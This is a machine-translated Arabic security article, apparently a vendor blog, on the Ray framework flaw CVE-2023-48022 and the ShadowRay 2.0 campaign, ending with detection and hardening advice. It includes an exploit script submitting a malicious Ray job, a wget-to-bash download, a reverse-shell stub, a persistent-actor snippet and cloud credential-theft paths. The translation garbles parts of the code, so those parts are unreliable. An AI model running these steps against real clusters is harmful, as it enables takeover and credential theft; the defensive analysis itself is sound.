إنه عام 2026. لقد نضجت صناعة الذكاء الاصطناعي من روبوتات الدردشة التجريبية إلى الوكلاء المستقلين الذين يديرون البنية التحتية الحيوية. ومع ذلك، فإن شبحاً من الماضي يطارد مزارع الخوادم ومجموعات Kubernetes لأكثر شركات الذكاء الاصطناعي تقدماً في العالم: CVE-2023-48022.

تم الكشف عن هذه الثغرة الأمنية الحرجة (CVSS 9.8) في أواخر عام 2023، وهي ثغرة حرجة (CVSS 9.8) في إطار عمل راي-معيار الحوسبة الموزعة الذي تستخدمه OpenAI وأوبر وأمازون- كان من المفترض أن تكون مشكلة تم حلها. ومع ذلك، فإن الانفجار الذي حدث في أواخر عام 2025 من شادو راي 2.0 أثبتت الروبوتات خلاف ذلك. فقد تم تجنيد عشرات الآلاف من مجموعات وحدات معالجة الرسوميات بصمت في شبكات الزومبي، ليس فقط من أجل التشفير، ولكن من أجل عمليات استخراج البيانات المتطورة وهجمات الحرمان من الخدمة الموزعة (DDoS).

بالنسبة للنخبة من مهندسي أمن الذكاء الاصطناعي، فإن CVE-2023-48022 ليس مجرد خطأ؛ بل هو دراسة حالة في "غير آمن حسب التصميم" وهو يمثل تصادمًا بين ثقافة البحث المفتوح لتطوير الذكاء الاصطناعي والواقع العدائي للإنترنت الحديث. يقدم هذا المقال تحليلاً جنائياً للثغرة الأمنية، ويحلل الحرفة المتطورة ل ShadowRay 2.0، ويوضح سبب فشل المسح القديم في حماية الركيزة الحاسوبية للذكاء الاصطناعي.

هيكلية "الميزة كضعف"

لفهم سبب رفض CVE-2023-48022 للموت، يجب على المرء أن يفهم فلسفة راي. تم تصميم راي للسرعة وسهولة الاستخدام في الشبكات الداخلية الموثوقة.

الخلل

في الإصدارات السابقة للتقوية الكبيرة (وفي عمليات النشر الحديثة التي تمت تهيئتها بشكل خاطئ)، ترتبط لوحة معلومات راي وواجهة برمجة التطبيقات الخاصة بالوظائف ب 0.0.0.0:8265 افتراضيًا دون أي آليات مصادقة.

في البداية اعترضت شركة Anyscale، مبتكرو راي، في البداية على تعيين CVE، بحجة أن راي كان الغرض منه أن يعمل ضمن محيط شبكة صارم. انهار هذا الاعتماد على نموذج دفاع "الغلاف الخارجي الصلب" عندما بدأ المطورون في تعريض لوحات معلومات راي للإنترنت للمراقبة عن بعد، أو عندما استخدم المهاجمون تزوير الطلبات من جانب الخادم (SSRF) للتمحور داخليًا.

تفكيك سطح الهجوم

تمنح الثغرة المهاجم السيطرة الكاملة على مجموعة Ray عبر واجهة برمجة تطبيقات HTTP بسيطة. لا يوجد تلف في الذاكرة، ولا توجد حالة سباق، ولا يتطلب الأمر وجود كومة معقدة من البيانات.

البدائيون المهاجمون

1. نقطة الدخول واجهة برمجة تطبيقات الوظائف (/api/jobs/).
2. الآلية تسمح واجهة برمجة التطبيقات (API) بإرسال كود Python أو أوامر Python عشوائية ليتم تنفيذها على العقد العاملة للمجموعة.
3. الامتياز غالبًا ما يتم تشغيل عمليات الراي على أنها الجذر داخل حاويات Docker، أو بأدوار IAM ذات امتيازات عالية للوصول إلى دلاء S3 التي تحتوي على مجموعات بيانات.

الإعادة التقنية: سلسلة القتل ShadowRay ShadowRay

دعونا نعيد بناء منطق الاستغلال الذي تستخدمه الجهات الفاعلة في ShadowRay 2.0. هذا يتجاوز مجرد الضفيرة أوامر لإظهار كيفية تنظيمها للتحكم المستمر.

المرحلة 1: الاستطلاع وأخذ البصمات

يبحث المهاجمون عن منفذ TCP على وجه التحديد 8265. يقومون ببصمة الخدمة عن طريق الاستعلام عن /بابي/إصدار أو البحث عن عنوان لوحة معلومات راي المميزة HTML.

المرحلة 2: التسليح (تقديم وظيفة بايثون)

يقوم المهاجم بإنشاء برنامج نصي من لغة Python يعمل ك "مرسل مهمة". يتفاعل هذا النص البرمجي مع واجهة برمجة التطبيقات الخاصة بالهدف لتوليد مهمة خبيثة.

بايثون

'استيراد الطلبات استيراد json استيراد sys

الهدف مجموعة أشعة مكشوفة تم العثور عليها عبر Shodan أو SSRF

TARGET_IP = "http://target-cluster.ai:8265“

def exploit_cluster(target): url = f"{target}/API/jobs/"

# الحمولة: نص برمجي باش متعدد المراحل
# 1. الثبات: إنشاء وظيفة cron job أو خدمة systemd مخفية
# 2. التهرب: قتل عمال المناجم المتنافسين
# 3. الاتصال: قذيفة عكسية إلى C2
نقطة الدخول_cmd = (
    " wget -qO-  | | bash & "
    " تصدير OMP_NUM_THREADS=1 && "
    "python3 -c 'استيراد socket,os,pty;s=socket.socket()؛...."
)

الحمولة = {
    "نقطة الدخول": نقطة الدخول_cmd,
    "submit_id": "optimization_task_v4", # Social Engineering: تبدو وكأنها مهمة شرعية
    "runtime_env": {
        "working_dir": "/tmp",
        "pip": ["الطلبات"، "boto3"] # أدوات ما قبل التثبيت للاستخراج
    },
    "البيانات الوصفية": {
        "المستخدم": "الجذر",
        "الوصف": "فحص صحة النظام"
    }
}

محاولة:
    طباعة (f"[*] إرسال الحمولة إلى {الهدف}...")
    resp = طلبات.post(url، json=الحمولة، المهلة=10)
    
    إذا كان resp.status_code==200:
        job_id = resp.json().get('job_id')
        طباعة(f"[+] تم الاستغلال بنجاح. معرف الوظيفة: {job_id}")
        طباعة(و"[+] المجموعة الآن تحت سيطرتك.")
    غير ذلك
        طباعة(f"[-] فشل: {resp.status_code} - {resp.text}")
        
باستثناء استثناء كـ e:
    طباعة(f"[!] خطأ: {e}")

إذا الاسم == “الرئيسية": exploit_cluster(TARGET_IP)``

المرحلة 3: التنقل الجانبي عبر سرقة الهوية

بمجرد تنفيذ الشيفرة البرمجية على العقدة العاملة، يستفيد النص البرمجي من خدمة بيانات تعريف المثيل (IMDS) لسرقة بيانات الاعتماد السحابية

• AWS: استعلام http://169.254.169.254/latest/meta-data/iam/security-credentials/ لسرقة مفاتيح دور EC2.
• Kubernetes: اقرأ /var/run/secrets/kubernetes.io/serviceaccount/رمز.

نظرًا لأن وظائف التدريب على الذكاء الاصطناعي تتطلب الوصول إلى مجموعات بيانات ضخمة، فغالبًا ما يكون لهذه الاعتمادات S3الوصول الكامل أو ما يعادلها من أذونات، مما يسمح للمهاجم باستخراج نماذج الملكية (التي تساوي الملايين) أو تسميم بيانات التدريب.

شادو راي 2.0: تطور الثبات

قدم المتغير "2.0" الذي لوحظ في أواخر عام 2025 آلية ثبات جديدة: الجهات الفاعلة المنفصلة.

في راي، "الفاعل" في راي هو عملية عاملة ذات حالة. يقوم المهاجمون بنشر "الجهات الفاعلة" الخبيثة المصممة للانفصال عن دورة حياة المهمة. حتى لو قام فريق الأمن بإيقاف "المهمة" المحددة التي تظهر في لوحة التحكم، تظل عملية "الفاعل" حية في الخلفية، وتستهلك الموارد وتحافظ على الارتباط C2.

بايثون

''# الممثل الخبيث المفاهيمي @Ray.Remote فئة ShadowActor: def ابدأ(ذاتي): self.c2_connection = setup_c2()

def keep_alive(self):
    بينما صحيح:
        # التعدين أو منطق الاستخراج
        معالجة_البيانات()
        الوقت.sleep(1)

النشر كممثل منفصل - ينجو من إنهاء الوظيفة

الممثل = ShadowActor.options.options(name="system_optimizer"، عمر="منفصل").Remote()

مشكلة "ذكاء الظل الاصطناعي" وفشل الاكتشاف

لماذا لا تزال المؤسسات التي لديها جدران حماية باهظة الثمن تتعرض لاختراق CVE-2023-48022؟ تكمن الإجابة في ظل الذكاء الاصطناعي.

غالبًا ما يتجاوز علماء البيانات ومهندسو تعلّم الآلة عناصر التحكم في تكنولوجيا المعلومات لإعداد مجموعات مؤقتة للتجارب. فهم يستخدمون نصوص Terraform البرمجية أو مخططات Helm المنسوخة من GitHub، والتي يتم عرضها افتراضيًا على لوحة التحكم لسهولة تصحيح الأخطاء. تكون "مجموعات الظل" هذه غير مرئية لمخزون تكنولوجيا المعلومات المركزي وأجهزة فحص الثغرات التقليدية (التي تفحص 192.168.1.0/24 ولكننا نفتقد إلى نقاط البيع الافتراضية سريعة الزوال التي أنشأها المهندسون).

علاوة على ذلك، تتحقق الماسحات الضوئية التقليدية من إصدارات البرامج. إذا قام أحد المهندسين بتشغيل مجموعة راي العنقودية باستخدام صورة Docker قديمة ومستقرة (على سبيل المثال, رايبروجكت/راى:2.8.0) لإعادة إنتاج ورقة بحثية، فهي عرضة للخطر على الفور.

الدفاع القائم على الذكاء الاصطناعي: نهج Penligent

يتطلب الدفاع ضد أشعة الظل أكثر من مجرد فحص ثابت؛ فهو يتطلب اكتشاف الأصول الديناميكية و التحليل السلوكي.

هذا هو المكان Penligent.ai تغيير الموقف الدفاعي للبنية التحتية للذكاء الاصطناعي.

1. رسم خرائط تركة الظل

يتكامل وكلاء Penligent مع واجهات برمجة التطبيقات السحابية (AWS وAzure وGCP) ومجموعات Kubernetes لإجراء الاكتشاف المستمر للأصول. وهو يحدد مثيلات الحوسبة التي تُظهر سلوكًا "شبيهًا بسلوك "راي" (المنافذ المفتوحة 8265 و10001 و6379) حتى لو لم يتم تمييزها كأصول إنتاج. هذا يضيء سطح "ظل الذكاء الاصطناعي".

2. التحقق النشط والآمن

بدلاً من الاعتماد على انتزاع اللافتات (التي يمكن تزييفها)، يقوم Penligent بتنفيذ التحقق النشط الآمن. إنه يحاول التفاعل مع واجهة برمجة التطبيقات للوظائف باستخدام حمولة حميدة - مثل إرسال مهمة تقوم ببساطة بحساب 1 + 1 أو يردد سلسلة عشوائية.

• في حال نجاحها: فهو يؤكد مخاطر RCE مع عدم وجود أي نتائج إيجابية كاذبة وينبه مركز العمليات الأمنية على الفور.
• السلامة: على عكس الدودة، لا يقوم مسبار Penligent بتعديل حالة النظام أو تثبيت الثبات أو استخراج البيانات.

3. كشف الشذوذ في التوقيعات الحسابية

يضع Penligent خط أساس لأعباء العمل التدريبية المشروعة. إصابات ShadowRay لها بصمة مميزة:

• الشبكة: اتصالات صادرة غير متوقعة إلى مجمعات التعدين أو عناوين IP غير معروفة (C2).
• احسب: طفرات استخدام وحدة المعالجة المركزية/وحدة معالجة الرسومات التي لا ترتبط بمهام التدريب المجدولة.
• العملية: تفريخ الأصداف غير العادية (/بين/باش, الضفيرة, wget) من شجرة عمليات راي العامل.

الاستراتيجية الدفاعية لعام 2026: تقوية الركيزة الحاسوبية

لتحصين بنيتك التحتية ضد CVE-2023-48022 وتوابعها، قم بتنفيذ عناصر التحكم الصارمة هذه:

1. شبكات الثقة الصفرية: لا تعرض لوحة تحكم راي على الإنترنت العام. يجب أن يكون الوصول بوساطة عبر مضيف Bastion Host آمن، أو VPN، أو وكيل مدرك للهوية (IAP) مثل Cloudflare Access أو AWS Verified Access.
2. فرض المصادقة (TLS المتبادلة): بينما يدعم راي الآن المصادقة الأساسية، فإن المعيار الذهبي هو mTLS. قم بتكوين Ray لطلب شهادات العميل لجميع الاتصالات داخل المجموعة واتصالات العميل-الخادم.
3. عزل مساحة الاسم: قم بتشغيل مجموعات راي في مساحات أسماء Kubernetes مخصصة مع صرامة سياسات الشبكة. رفض كل حركة مرور الخروج إلا إلى دلاء S3 المدرجة في القائمة البيضاء وسجلات النماذج (عناق الوجه). حظر الوصول إلى IMDS (169.254.169.254).
4. بنية تحتية غير قابلة للتغيير: استخدم أنظمة الملفات الجذر للقراءة فقط لحاويات راي العاملة لمنع المهاجمين من تنزيل الأدوات أو إنشاء ثبات على القرص.

الخاتمة

CVE-2023-48022 ليست مجرد ثغرة أمنية؛ بل هي أحد أعراض اندفاع الصناعة لتبني الذكاء الاصطناعي على حساب البنية الأمنية. ومع اعتمادنا بشكل أكبر على الحوسبة الموزعة، لم تعد "حدود الشبكة" دفاعاً كافياً.

تُثبت حملة ShadowRay 2.0 أن المهاجمين يبحثون بنشاط عن هذه الأبواب المفتوحة. يجب أن يتبنى مهندسو الأمن عقلية "افتراض الاختراق"، والاستفادة من الأدوات التي تعتمد على الذكاء الاصطناعي مثل Penligent لاكتشاف واختبار وتقوية أصول الحوسبة الخاصة بهم باستمرار قبل أن تصبح العقدة التالية في شبكة روبوتات الزومبي.

مراجع موثوقة

• أوليغو سيكيوريتي شادو راي - أول حملة هجوم بالذكاء الاصطناعي على أعباء العمل
• نصيحة أمنية من أنيسكال CVE-2023-48022
• تفاصيل NIST NVD CVE-2023-48022
• الوحدة 42: تقرير التهديدات السحابية - البنية التحتية للذكاء الاصطناعي